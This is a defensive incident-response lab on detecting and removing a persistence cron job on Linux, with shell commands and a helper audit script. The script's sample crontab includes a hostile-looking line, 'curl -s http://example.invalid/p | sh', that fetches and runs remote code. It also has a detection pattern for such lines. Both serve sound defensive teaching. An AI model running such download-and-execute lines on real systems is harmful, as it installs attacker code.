Day 21 – Detecting & Removing Malicious Cron Jobs on Linux

Objective: Learn to find and eliminate unauthorized cron jobs set up by attackers.

Challenge Description: As discovered in Day 19, the attacker used cron for persistence. Now assume another variant where a cron job was planted to run a malicious script every minute. Your task is to locate and remove this cron job and script on the Linux system. This mirrors real incidents where cron is abused for persistence[18].

Tools: Linux shell, commands like grep, crontab -l, text editor. Check system logs (/var/log/syslog or /var/log/cron) for cron activity. Use integrity tools (e.g. auditctl or inotify) if available to monitor changes.

Steps to Solve:

1. List cron jobs: Run crontab -l for each user (and sudo crontab -l for root). Also check files under /etc/cron.* and /var/spool/cron/. Look for unexpected entries, especially those running scripts in /tmp or hidden files.

2. Search for anomalies: Use grep -r "/tmp/" /etc/cron* /var/spool/cron to quickly find cron jobs referencing temporary directories (a common red flag)[21].

3. Verify cron service and logs: Ensure the cron daemon is running (systemctl status cron). Review /var/log/syslog or /var/log/cron for recent job executions. For example: grep CRON /var/log/syslog to find timestamps of job runs.

4. Confirm script execution: If the cron job runs a script (e.g. /tmp/malicious.sh), check for evidence such as a log file or process. In our lab, suppose /tmp/.cron.log contains repetitive output (as per the script's behavior).

5. Remove malicious cron entry: Edit the affected user's crontab (e.g. sudo crontab -u root -e) and delete the line referring to the malicious script (or run crontab -l | grep -v malicious.sh | crontab -). Verify with crontab -l that it's gone.

6. Delete malicious script and clean up: Remove the script and related files (rm /tmp/malicious.sh /tmp/.cron.log). Restart cron (systemctl restart cron) to apply changes.

7. Harden defenses: Optionally, set up file integrity monitoring on cron directories or alerts on new cron entries using tools like auditd or inotify.

Simulated Lab: You run grep -r "/tmp/" /var/spool/cron and find an entry in root’s crontab: * * * * * /tmp/malicious.sh. Viewing /tmp/malicious.sh shows it appends “Ping from attacker” to /tmp/.cron.log each run. Checking /tmp/.cron.log, you see timestamps every minute, confirming the job is active.

To remove it, execute:

sudo crontab -l | grep -v malicious.sh | sudo crontab -   # remove malicious line
sudo rm -f /tmp/malicious.sh /tmp/.cron.log                # delete script and log
sudo systemctl restart cron                                # restart cron daemon

After this, crontab -l shows no malicious jobs and /tmp/.cron.log is deleted. You also check /var/log/syslog for “malicious.sh” entries to find when the job ran.
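The triage in steps 1, 2 and 5 above, as an added helper script (not part of the original lab): it flags crontab lines that reference temp directories, hidden path components or download-and-pipe commands, and produces the cleaned crontab text without touching a live crontab. The sample crontab, SUSPECT_RE and the function names are constructed for this example.

```shell
#!/bin/sh
# Added audit helper (not from the original lab). Heuristics only: flags cron
# lines that reference temp dirs, hidden path components, or download-and-pipe
# commands. Tune SUSPECT_RE for your environment.
SUSPECT_RE='(/tmp/|/var/tmp/|/dev/shm/|/\.[A-Za-z0-9_]|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh)'

# scan_cron_file FILE: print flagged lines (comments and blanks skipped).
# Returns 1 when nothing was flagged, as grep does.
scan_cron_file() {
    grep -v '^[[:space:]]*#' "$1" | grep -v '^[[:space:]]*$' | grep -E "$SUSPECT_RE"
}

# count_suspect FILE: number of flagged lines, 0 if clean.
count_suspect() {
    scan_cron_file "$1" | wc -l | tr -d ' '
}

# remove_entry FILE PATTERN: crontab text with lines containing PATTERN dropped.
# Same idea as the lab's crontab -l | grep -v malicious.sh | crontab -, but it
# only emits the cleaned text; pipe it into crontab - yourself once reviewed.
remove_entry() {
    grep -vF "$2" "$1"
}

# Constructed sample crontab (not from a real system), mirroring the lab finding.
SAMPLE_CRONTAB="$(mktemp)"
trap 'rm -f "$SAMPLE_CRONTAB"' EXIT
cat > "$SAMPLE_CRONTAB" <<'EOF'
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
* * * * * /tmp/malicious.sh
*/5 * * * * /home/user/.cache/.x/update.sh
30 1 * * * curl -s http://example.invalid/p | sh
EOF

# On a live host, run scan_cron_file over /var/spool/cron/crontabs/* and /etc/cron*.
if scan_cron_file "$SAMPLE_CRONTAB"; then
    echo "flagged $(count_suspect "$SAMPLE_CRONTAB") suspicious cron line(s)"
fi
```

The legitimate backup job is not flagged, while the /tmp script, the hidden-directory script and the pipe-to-shell download are.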

Key Citations: Cron jobs are often used by attackers for persistence. They are legitimate scheduled tasks that run at intervals[22], so reviewing cron configurations can reveal unauthorized scripts set to execute periodically[18]. Always inspect both user and system cron directories (/var/spool/cron/, /etc/cron.*) and use logging (/var/log/syslog) to detect suspicious entries.

Sources: Information in these labs is based on best practices and recent research in phishing and incident response[23][24][9][12][13][15][20][19][22][1]. These sources provide guidance on email authentication (SPF/DKIM), phishing analysis, IR lifecycle, Linux forensic artifacts, PowerShell logging, and cron abuse.